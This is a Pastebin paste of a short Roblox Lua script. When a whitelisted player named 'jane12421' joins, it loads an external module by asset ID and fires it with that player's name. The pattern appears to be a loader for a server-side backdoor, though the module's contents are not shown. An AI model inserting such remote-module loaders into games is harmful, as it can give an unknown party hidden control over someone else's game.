Advertisement
whyumean

Untitled

Mar 15th, 2020
156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. local allowed = {"jane12421"}
  2. game.Players.PlayerAdded:Connect(function(player)
  3. for i, v in pairs(allowed) do
  4. if player.Name == v then
  5. require(3146633195):Fire(player.Name)
  6. end
  7. end
  8. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement